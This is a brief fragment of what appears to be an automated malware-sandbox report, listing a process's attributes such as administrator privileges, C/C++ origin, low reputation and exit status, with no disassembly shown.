                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly